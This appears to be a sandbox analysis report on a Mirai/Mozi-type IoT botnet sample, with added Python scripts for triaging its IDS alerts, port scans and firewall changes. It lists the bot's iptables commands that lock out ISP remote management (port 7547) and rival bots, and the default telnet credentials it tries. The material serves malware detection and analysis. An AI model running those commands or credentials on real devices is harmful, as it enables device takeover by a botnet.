Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.23.114:1900 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.41.25.150:54444 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.201.195.174:4000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:33316 -> 23.223.90.123:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:33316 -> 23.223.90.123:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.90.123:80 -> 192.168.2.20:33316
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.166.157.83: -> 192.168.2.20:
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.25.228.4: -> 192.168.2.20:
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.181.148:4000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:47544 -> 23.61.13.112:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:47544 -> 23.61.13.112:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.61.13.112:80 -> 192.168.2.20:47544
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37564 -> 81.2.194.201:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37564 -> 81.2.194.201:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:60742 -> 13.58.205.33:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:60742 -> 13.58.205.33:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:46956 -> 51.182.50.200:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:46956 -> 51.182.50.200:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40652 -> 104.72.178.146:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40652 -> 104.72.178.146:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.72.178.146:80 -> 192.168.2.20:40652
Source: Traffic Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.236.70: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.228.33.143: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.180.140.79: -> 192.168.2.20:
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59032 -> 85.23.70.174:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59032 -> 85.23.70.174:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:59348 -> 95.217.3.9:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:59348 -> 95.217.3.9:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38708 -> 204.85.28.95:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38708 -> 204.85.28.95:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36964 -> 47.96.100.38:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36964 -> 47.96.100.38:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40456 -> 35.201.127.68:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40456 -> 35.201.127.68:8080
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 193.136.134.150: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 163.28.1.241: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 37.138.93.139: -> 192.168.2.20:
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.183.25.195: -> 192.168.2.20:
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:44746 -> 220.130.214.100:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:34312 -> 121.5.104.125:80
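Most of the alerts above are not the sample's own traffic: the ICMP unreachables are routers rejecting its probes, the Mozi DHT lines are inbound from other hosts to the VM's port 8000 and do not originate from the sample, and TELNET access / ATTACK-RESPONSES fire on replies from hosts the sample contacted. What the sample itself does is in the outbound lines (source 192.168.2.20): command-injection attempts against JAWS/MVPower DVR, GPON, Netgear DGN and D-Link HNAP web interfaces, and telnet logins with Mirai's built-in credentials. The Python below is an added example, not part of the report, that parses lines in this exact format, separates those categories, collapses the two rules that fire on the same flow into one attempt, and pulls out the credentials tried; it runs on twelve lines copied from the list above.

```python
import re
from collections import Counter, defaultdict

SANDBOX_IP = "192.168.2.20"   # the analysis VM, as seen in every alert above

# Twelve alert lines copied unchanged from the report.
SAMPLE_ALERTS = """\
Source: Traffic Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.77.238.132: -> 192.168.2.20:
Source: Traffic Snort IDS: 716 INFO TELNET access 183.222.240.78:23 -> 192.168.2.20:43610
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36484 -> 34.90.159.216:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36484 -> 34.90.159.216:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 63.143.96.217:8000 -> 192.168.2.20:8000
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38662 -> 193.176.117.172:80
Source: Traffic Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.20:54678 -> 86.125.215.125:23
Source: Traffic Snort IDS: 2023443 ET TROJAN Possible Linux.Mirai Login Attempt (klv123) 192.168.2.20:54682 -> 86.125.215.125:23
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56306 -> 159.138.143.231:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56306 -> 159.138.143.231:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33260 -> 3.11.29.16:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.11.241:80 -> 192.168.2.20:50210
"""

# "<sid> <message> <src>:<sport> -> <dst>:<dport>"; ports are empty for ICMP lines
ALERT_RE = re.compile(
    r"Snort IDS: (?P<sid>\d+) (?P<msg>.+?) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d*) -> (?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d*)\s*$"
)


def classify(a: dict) -> str:
    msg, outbound = a["msg"], a["src"] == SANDBOX_IP
    if msg.startswith("ICMP"):
        return "icmp-noise"            # routers rejecting probes; only useful as scan volume
    if "Mirai Login Attempt" in msg:
        return "telnet-bruteforce"     # the sample trying a known Mirai credential on port 23
    if outbound and ("EXPLOIT" in msg or "Shell Command Execution" in msg):
        return "outbound-exploit"      # the sample attacking an internet host
    if not outbound and msg.startswith("ET TROJAN Mozi"):
        return "inbound-unsolicited"   # other hosts contacting the VM; not the sample's doing
    if not outbound:
        return "response"              # banners and error pages from hosts the sample hit
    return "other"


def triage(text: str) -> dict:
    counts = Counter()
    by_sid = defaultdict(set)   # outbound exploit SID -> {(target, port)}
    flows = set()               # one (src port, target, port) per attempt, even if two SIDs fire
    creds = []                  # (credential from the rule name, target) for telnet logins
    for line in text.splitlines():
        m = ALERT_RE.search(line)
        if not m:
            continue
        a = m.groupdict()
        cat = classify(a)
        counts[cat] += 1
        if cat == "outbound-exploit":
            by_sid[a["sid"]].add((a["dst"], a["dport"]))
            flows.add((a["sport"], a["dst"], a["dport"]))
        elif cat == "telnet-bruteforce":
            creds.append((re.search(r"\(([^)]+)\)", a["msg"]).group(1), a["dst"]))
    return {"counts": dict(counts), "by_sid": dict(by_sid),
            "exploit_flows": flows, "creds": creds}


if __name__ == "__main__":
    r = triage(SAMPLE_ALERTS)
    print(r["counts"])
    print("distinct exploit attempts:", len(r["exploit_flows"]))
    print("credentials tried:", r["creds"])
```

Collapsing on (source port, target, port) matters: the report fires two signatures per Netgear DGN and per JAWS/MVPower request, so counting alerts overstates the number of attacks by roughly a factor of two. The credential names come from the rule titles themselves (xmhdipc, klv123, hi3518, anko, 7ujMko0vizxv in the list above), which is why they are recoverable from the alert text without a packet capture.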
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 46.254.1.124 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 217.196.154.24 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 77.190.22.139 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 26.95.223.242 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 34.46.25.239 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 138.94.203.237 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 160.49.32.226 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 92.171.56.228 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 82.134.248.77 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 199.218.221.131 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 159.162.153.137 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 26.139.153.168 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 142.143.222.228 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 14.106.178.189 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 129.177.173.85 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 158.130.170.201 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 185.57.154.59 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 180.142.151.223 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 70.83.19.226 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 148.228.211.150 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 218.1.134.21 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 181.215.101.174 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 6.158.170.206 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 85.124.222.42 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 165.94.66.173 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 84.49.20.203 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 126.241.242.120 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 148.53.105.39 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 163.224.207.250 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 47.83.189.211 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 186.149.104.105 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 105.109.18.186 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 83.190.231.93 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 113.203.125.76 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 96.186.107.158 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 113.37.245.122 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 94.202.222.110 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 29.5.215.81 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 132.228.243.137 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 77.188.2.23 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 160.116.99.47 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 24.87.139.212 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 204.7.247.28 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 137.33.28.160 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 113.237.9.87 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 4.122.58.30 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 174.9.64.0 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 56.89.187.128 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 182.150.145.27 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 180.195.241.242 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 61.67.234.110 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 189.124.245.91 ports 1,2,3,5,7,37215
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 4616) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4650) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4653) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
Source: /bin/sh (PID: 4716) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4736) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
Source: /bin/sh (PID: 4748) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT
Source: /bin/sh (PID: 4793) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4796) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4805) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4829) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4878) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4906) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4926) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4931) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4947) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4974) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 5000) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 5021) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 5025) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 5034) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 5057) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 5087) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 5117) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5120) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5127) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5152) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8000 -j ACCEPT
Source: /bin/sh (PID: 5182) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8000 -j ACCEPT
Source: /bin/sh (PID: 5210) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT
Source: /bin/sh (PID: 5231) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT
Source: /bin/sh (PID: 5234) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT
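The iptables invocations above reduce to a small policy. TCP 54753 and UDP 8000 are accepted in the filter INPUT/OUTPUT chains and also in the nat table's PREROUTING/POSTROUTING chains (an ACCEPT in the nat table only ends nat processing for that traffic, so these rules keep the bot's own ports out of any port-forwarding or masquerading the device applies). TCP 58000, 35000, 50023 and 7547 are dropped in both directions; 7547 is the CWMP/TR-069 port that ISPs use for remote management of CPE. Every rule is issued twice, once with the long port switch and once with the short one, presumably so that at least one form is accepted by whatever iptables build the device ships. Dropping remote-management and other inbound ports while opening its own is the usual way a bot keeps the operator and competing bots off a device. The Python below is an added detection example, not code from this report or from the sample: it extracts the command from report lines of this shape (bare iptables commands are accepted too), parses them, and reports which ports were opened, blocked, or exempted from nat. The sample input is a constructed, abbreviated subset of the lines above.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample: an abbreviated subset of the report lines above, with the
# "/sbin/iptables -> <command>" part kept intact. One line keeps the page's
# "Jump to behavior" link residue to show that the extractor strips it.
SAMPLE_REPORT = """\
/bin/sh (PID: 4616): /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
/bin/sh (PID: 4650): /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
/bin/sh (PID: 4653): /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
/bin/sh (PID: 4690): /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
/bin/sh (PID: 4793): /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP Jump to behavior
/bin/sh (PID: 4796): /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
/bin/sh (PID: 4878): /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
/bin/sh (PID: 4906): /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
/bin/sh (PID: 4947): /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
/bin/sh (PID: 5057): /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
/bin/sh (PID: 5117): /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8000 -j ACCEPT
/bin/sh (PID: 5127): /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8000 -j ACCEPT
"""

# The command follows the "->" in a report line; trailing link text is dropped.
COMMAND_RE = re.compile(r"->\s+((?:\S*/)?iptables\b.*?)(?:\s+Jump to behavior)?\s*$")

# Long and short spellings of the port switches are the same option.
PORT_SWITCHES = {"--dport": "dport", "--destination-port": "dport",
                 "--sport": "sport", "--source-port": "sport"}


def extract_command(line):
    """Return the iptables command in a report line, or a bare command unchanged."""
    m = COMMAND_RE.search(line)
    if m:
        return m.group(1)
    bare = line.strip()
    return bare if bare.rsplit("/", 1)[-1].split(" ", 1)[0] == "iptables" else None


def parse_rule(command):
    """Parse 'iptables -I/-A CHAIN [num] [-t TABLE] [-p PROTO] [--dport N] -j TARGET'.
    Returns None for commands that do not add a rule (e.g. 'iptables -L')."""
    argv = shlex.split(command)
    if not argv or argv[0].rsplit("/", 1)[-1] != "iptables":
        return None
    rule = {"table": "filter", "chain": None, "proto": "all", "target": None}
    i = 1
    while i < len(argv):
        opt = argv[i]
        val = argv[i + 1] if i + 1 < len(argv) else None
        if opt in ("-I", "-A", "--insert", "--append") and val:
            rule["chain"] = val
            i += 2
            if opt in ("-I", "--insert") and i < len(argv) and argv[i].isdigit():
                i += 1  # optional rule number after the chain name
        elif opt in ("-t", "--table") and val:
            rule["table"] = val
            i += 2
        elif opt in ("-p", "--protocol") and val:
            rule["proto"] = val.lower()
            i += 2
        elif opt in ("-j", "--jump") and val:
            rule["target"] = val
            i += 2
        elif opt in PORT_SWITCHES and val:
            rule[PORT_SWITCHES[opt]] = int(val)
            i += 2
        else:
            i += 1  # matches we do not model (-s, -i, -m, ...)
    return rule if rule["chain"] and rule["target"] else None


def iter_rules(lines):
    """Yield parsed rules for every report line or bare command that adds one."""
    for line in lines:
        cmd = extract_command(line)
        rule = parse_rule(cmd) if cmd else None
        if rule:
            yield rule


def classify(lines):
    """Map (proto, port) -> 'opened' (only ACCEPT), 'blocked' (only DROP) or 'mixed'."""
    by_port = defaultdict(set)
    for rule in iter_rules(lines):
        port = rule.get("dport", rule.get("sport"))
        if port is not None:
            by_port[(rule["proto"], port)].add((rule["table"], rule["chain"], rule["target"]))
    verdict = {}
    for key, rules in by_port.items():
        targets = {target for _, _, target in rules}
        verdict[key] = {frozenset({"ACCEPT"}): "opened",
                        frozenset({"DROP"}): "blocked"}.get(frozenset(targets), "mixed")
    return verdict


def blocked_ports(lines):
    """Sorted list of ports the sample dropped (candidates for 'what was it locking out?')."""
    return sorted(port for (_, port), state in classify(lines).items() if state == "blocked")


def nat_exempted(lines):
    """(proto, port) pairs ACCEPTed both in filter/INPUT and in nat/PREROUTING: the
    port is allowed in and kept out of the device's own DNAT/port-forwarding rules."""
    chains = defaultdict(set)
    for rule in iter_rules(lines):
        if rule["target"] == "ACCEPT" and "dport" in rule:
            chains[(rule["proto"], rule["dport"])].add((rule["table"], rule["chain"]))
    wanted = {("filter", "INPUT"), ("nat", "PREROUTING")}
    return sorted(key for key, seen in chains.items() if wanted <= seen)


if __name__ == "__main__":
    lines = SAMPLE_REPORT.splitlines()
    for key, state in sorted(classify(lines).items()):
        print(f"{key[0]}/{key[1]}: {state}")
    print("blocked:", blocked_ports(lines))
    print("nat-exempted:", nat_exempted(lines))
```

Run against the full signature list, the output is the three-line summary a triage note needs: what the bot listens on (and therefore what to look for in the device's own netstat or in the sandbox's "Sample listens on a socket" signature), and what it is shutting off. A DROP of 7547 on a consumer router is worth a dedicated alert on its own, because it cuts the ISP's remote-management path and nothing legitimate on the device does that from a shell.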
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 47738 -> 8443
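Two lists in this report are scan-shaped: the per-host port sets under "Connects to many ports of the same IP" above, and the per-connection entries under "Detected TCP or UDP traffic on non-standard ports" that follow. A detection engineer reduces them to three facts. First, which port sets recur across unrelated hosts; here there are exactly three, ending in 37215, 52869 and 49152 (37215 and 52869 are the ports on which Mirai variants deliver their Huawei HG532 and Realtek SDK UPnP exploits). Second, whether one source port is reused for a whole sweep: the leaked Mirai scanner picks a single random source port at start and sends raw SYNs with it for the entire run, which is why every 2323 and 1023 probe in the list below leaves from 192.168.2.20:51003, while the exploit attempts on 8080, 8443, 81 and the rest use ordinary ephemeral ports. Third, which destination ports reach the most hosts. The Python below is an added example, not part of the Joe Sandbox report; it parses both entry formats the report uses and computes those three summaries. The sample input is a constructed subset of the report's own lines.

```python
import re
from collections import defaultdict

# Constructed sample: a handful of the "TCP traffic" entries from this report, in
# both shapes the report uses (a per-host port summary, and a src -> dst flow).
SAMPLE_REPORT = """\
Source: global traffic TCP traffic: 46.254.1.124 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 82.134.248.77 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 77.190.22.139 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 217.196.154.24 ports 2,5,6,8,9,52869
Source: global traffic TCP traffic: 158.130.170.201 ports 1,2,3,5,7,37215
Source: global traffic TCP traffic: 26.95.223.242 ports 1,2,4,5,9,49152
Source: global traffic TCP traffic: 192.168.2.20:34160 -> 140.39.206.54:81
Source: global traffic TCP traffic: 192.168.2.20:60110 -> 108.39.69.131:8443
Source: global traffic TCP traffic: 192.168.2.20:37704 -> 157.94.79.109:5555
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 34.30.246.129:1023
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 72.193.100.130:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 191.130.205.66:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 168.204.132.3:2323
Source: global traffic TCP traffic: 192.168.2.20:51003 -> 165.218.11.121:1023
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
SUMMARY_RE = re.compile(r"TCP traffic:\s+" + IP + r"\s+ports\s+([\d,]+)\s*$")
FLOW_RE = re.compile(r"TCP traffic:\s+" + IP + r":(\d+)\s+->\s+" + IP + r":(\d+)\s*$")


def parse_line(line):
    """Return a dict for a summary or flow entry, or None for anything else."""
    m = FLOW_RE.search(line)
    if m:
        return {"kind": "flow", "src": m.group(1), "sport": int(m.group(2)),
                "dst": m.group(3), "dport": int(m.group(4))}
    m = SUMMARY_RE.search(line)
    if m:
        return {"kind": "summary", "dst": m.group(1),
                "ports": frozenset(int(p) for p in m.group(2).split(","))}
    return None


def scan_templates(lines, min_hosts=3):
    """Group target hosts by the exact set of ports they were probed on.
    A scanner working from a fixed probe list hits many unrelated hosts on the
    identical port set, so each set seen on >= min_hosts hosts is one template."""
    hosts = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["kind"] == "summary":
            hosts[rec["ports"]].add(rec["dst"])
    return {ports: sorted(h) for ports, h in hosts.items() if len(h) >= min_hosts}


def fixed_source_ports(lines, min_targets=5):
    """Source ports reused against >= min_targets distinct (host, port) targets.
    A normal TCP stack gives every connect() a fresh ephemeral port; a raw-socket
    SYN scanner that picks one source port for its whole run does not."""
    targets = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["kind"] == "flow":
            targets[rec["sport"]].add((rec["dst"], rec["dport"]))
    return {sport: len(t) for sport, t in targets.items() if len(t) >= min_targets}


def ports_by_reach(lines):
    """Destination ports of the flow entries, ordered by distinct hosts contacted."""
    reach = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["kind"] == "flow":
            reach[rec["dport"]].add(rec["dst"])
    return sorted(((p, len(h)) for p, h in reach.items()), key=lambda x: (-x[1], x[0]))


if __name__ == "__main__":
    lines = SAMPLE_REPORT.splitlines()
    for ports, hosts in scan_templates(lines, min_hosts=2).items():
        print("template", sorted(ports), "->", len(hosts), "hosts")
    print("fixed source ports:", fixed_source_ports(lines))
    print("ports by reach:", ports_by_reach(lines))
```

The thresholds are deliberately parameters: on this report min_hosts=3 and min_targets=5 are conservative, but on a single capture from a real edge device a source port reused against even three unrelated hosts on 23 or 2323 is enough to open a ticket. The same fixed-source-port heuristic translates directly to a NetFlow or Zeek conn.log query (count distinct id.resp_h per id.orig_p over a short window).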
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.20:34160 -> 140.39.206.54:81
Source: global traffic TCP traffic: 192.168.2.20:60110 -> 108.39.69.131:8443
